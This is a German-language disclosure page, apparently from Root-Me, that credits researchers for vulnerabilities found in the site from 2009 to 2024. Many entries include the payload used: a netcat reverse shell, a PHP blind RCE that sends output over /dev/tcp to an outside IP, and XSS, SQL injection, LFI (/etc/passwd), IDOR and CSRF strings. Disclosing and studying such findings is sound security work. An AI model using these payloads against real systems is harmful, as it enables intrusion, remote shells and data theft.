Entdeckte Schwachstellen

Wie bei jedem Informationssystem wurden auch bei der Website einige Schwachstellen festgestellt.

26/08/2024 Mika

hat eine OS Command Injection-Schwachstelle identifiziert, die es einem Benutzer ermöglicht, Root-Zugriff auf Challenge-Server zu erlangen, wenn er eine Challenge mit einem bösartigen Flag einsetzt.

RM{' && nc.traditional 51.75.X.X 4444 -e /bin/bash #}

21/08/2024 Vozec & Laluka

have eine Remote Code Execution (RCE)-Schwachstelle identifiziert, die es einem nicht authentifizierten Benutzer ermöglicht, PHP-Code auf dem SPIP-Portal auszuführen.

07/02/2024 Nishacid

hat eine gespeicherte XSS-Schwachstelle in Übersetzungen identifiziert, die es einem Mitglied der Vereinigung ermöglicht, eine beliebige Übersetzung der Website mit JavaScript-Code zu ändern, indem es :

<img/src/onerror=confirm(document.domain)>

22/11/2023 Laluka

Hat einen gespeicherten XSS (durch Datei-Upload) zu RCE über Code-Injektion auf die mediabox Konfiguration identifiziert. PHP-Code wird reflektiert (json_dump) und dann ausgewertet; das Zielkonto muss webmestre sein.

const form = doc.querySelector('form[action="/ecrire/?exec=configurer_mediabox"]');
const formData = new FormData(form);
formData.append("lity[<?php echo system(base64_decode('aWQ='));?>]", 42);

14/07/2023 Elweth

Es wurde eine Schwachstelle in der Version von Chrome Headless entdeckt, die Bots für Web-Client-Herausforderungen verwenden. Die betreffende Version war anfällig für CVE-2021-21224, was zur Codeausführung in der Umgebung des Bots führen konnte.

27/08/2022 Laluka

Hat eine Schwachstelle identifiziert, bei der die Änderung des Status des Inhalts der Website (Dokument, Herausforderung, Beitrag, ...) auf eine höhere Ebene (z. B. von Entwurf zu Bewertung oder von Papierkorb zu Schreiben) eine E-Mail an den Autor der Herausforderung und/oder den Webmaster auslöst. Einige Variablen, wie z.B. der Titel und der Inhalt, sind nicht richtig kodiert oder escaped, bevor sie an die eval-Funktion übergeben werden, die die E-Mail rendert. Dadurch konnte ein Blind-RCE mit einer Nutzlast wie <?php system("bash -c 'id > /dev/tcp/42.42.42.42/4242'"); ?> im Titel oder Inhalt des Artikels auftreten.

send(eval($email));

21/07/2022 Abyss Watcher& SpawnZii

haben eine Schwachstelle in der Remotecodeausführung (RCE) identifiziert, die es einem privilegierten Benutzer ermöglicht, PHP-Code auszuführen:

https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=TzoxOiJBIjoxOntzOjE6ImEiO3M6MzoiUG 9DIjt9'"><?php system('id;hostname;whoami');?>

Abyss Watcher SpawnZii

11/07/2022 Abyss Watcher

hat eine gespeicherte XSS-Schwachstelle identifiziert, die mit einem auf der RM-Domain gehosteten iframe ausgenutzt werden kann:

<iframe src="https://www.root-me.org/IMG/html/xss.html">

17/03/2022 Mizu

identifizierte eine gespeicherte XSS-Schwachstelle, die mit einem iframe ausgenutzt werden kann, der auf einer bösartigen Domain gehostet wird, die mit www.root-me.org beginnt:

<iframe src="https://www.root-me.org.evil.domain/">

23/11/2021 zLade

wurde eine Schwachstelle identifiziert, die es einem Mitglied der Vereinigung ermöglicht, seine Rolle zum Administrator zu erheben, indem es einfach die private Schnittstelle von SPIP verwendet.

01/10/2021 Podalirius

wurde eine Sicherheitslücke identifiziert, die den Zugriff auf Dokumente, die an Lösungen angehängt sind, ohne Einschränkungen ermöglicht:

<imgXX>

15/05/2020 Laluka

mehrere Schwachstellen identifiziert: 3 reflektierte XSS, 2 SQLi und 1 RCE :

https://www.root-me.org/ecrire/?exec=plan&null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=
https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(domain)%20autofocus/%3E
https://www.root-me.org/ecrire/?exec=admin_plugin&var_profile=pouet'/><script>alert(document.domain)</script>
https://www.root-me.org/ecrire/?exec=article_edit&lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--
/ecrire/?exec=accueil&where[]=(SELECT%20SLEEP(5)=1);--+-
https://www.root-me.org/ecrire/?exec=article&id_article=1&ajouter=non&tri_liste_aut=statut&deplacer=oui&_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E

12/01/2020 NonStandardModel

hat eine XSS-Schwachstelle im Namen der auf http://repository.root-me.org/ importierten Datei entdeckt. NonStandardModel

04/06/2019 warlock

hat eine XSS-Schwachstelle entdeckt. Diese erforderte einen Benutzereingriff in die Chatbox (einen Klick auf die vorherige Seite).

http://www.root-me.org/data:%2F%2Ftext/html,<script>alert(1)<%2Fscript>

04/06/2019 warlock

hat eine Schwachstelle identifiziert, die es einem unprivilegierten Benutzer erlaubt, die auf dem challenge01-Server verfügbare Datenbank, die mehrere Challenges beherbergt, zu zerstören, indem der Speicher auf eine bestimmte Weise gesättigt wird, um den Prozess seiner Wahl zu beenden. Dies ermöglichte den Neustart einer anderen Binärdatei, die über eine Race Condition auf demselben Port lauscht.

16/11/2018 Hacqueen

eine Schwachstelle identifiziert, die es erlaubt, die Nutzer des Shops über einen iframe über eine vom Angreifer kontrollierte spreadshirt-Domain (z.B. spreadshirt.ro) in die Falle zu locken, der Parameter lang wurde nicht korrekt gefiltert.

12/04/2018 DrStache& urandom

identifizierten eine gespeicherte XSS-Schwachstelle in der OSM-Karte in den CTFATD-Räumen, indem sie die folgende Nutzlast in die Biografie des Benutzers injizierten (https://www.root-me.org/?page=preferences&lang=en)

<svg onload=console.log(document.domain)>

DrStache urandom

12/10/2015 ST4HLKR1EG

hat eine "Insecure Direct Object Reference"-Schwachstelle identifiziert, die es ermöglicht, jede private Nachricht zu lesen:

page=messagerie&formulaire_action=messages_recus&formulaire_action_args=[valeur_random]&id_auteur=[id_auteur]&selection=sel&marquer_non_lus=marquer+comme+non+lu&selectionne[]=[message_ID]

03/2015 WtF

hat in einer Challenge, die auf dem Produktionsserver evaluiert wird, eine RCE-Schwachstelle (Remote Code Execution) entdeckt, die es ermöglicht, mit ssh auf das Dateisystem zuzugreifen und Befehle auszuführen.

03/2015 WtF

hat eine beliebige Dateieinschluss-Schwachstelle (LFI) in der Path Truncation Webserver-Herausforderung identifiziert, die es erlaubt, Dateien von anderen Herausforderungen zu lesen.

15/06/2013

LouTerraillounehat eine PHP-Code-Injection-Schwachstelle auf der Seite "code - decode" identifiziert:

Zu dekodierender Text in base64 :

PD9waHAgcGhwaW5mbygpOyA/Pg==

06/11/2012 jimee

mehrere gespeicherte XSS in der Benutzerprofilverwaltung gefunden:

<script>[code javascript/vbscript]</script>

20/03/2012 jimee

ein LFI in einer Herausforderung gefunden:

http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php

23/10/2011 courte66

fand einen reflektierten XSS in der "encode - decode" Seite:

Zu dekodierender Text in base64

Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=

02/10/2011 Hypnoze

eine unsichere indirekte Objektreferenz gefunden, die zu einem unautorisierten Zugriff auf alle PM führte:

http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_to_read]

11/07/2011 Armel

hat einen gespeicherten XSS in der Chatbox gefunden.

<iframe src="javascript:[code javascript]' />

18/07/2011 g0uZ

fand eine PHP-Code-Injection-Schwachstelle in den "Online-Tools : nmap"

Host zum Scannen im Modus -sV :

--version-trace -p8888 [IP server attacker]

Dienst, der auf dem Server des Angreifers lauscht

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done

30/06/2011 elyfean

hat einen CSRF in der Chatbox gefunden:

<form id="form" action="http//www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">
</form>

15/02/2011 EsSandre

ein LFI gefunden:

http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd

02/02/2011 hello

hat mehrere gespeicherte XSS im PM-System gefunden:

<script>[code javascript/vbscript]</script>

02/12/2009 real

hat eine Code-Injection-Schwachstelle gefunden:

http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'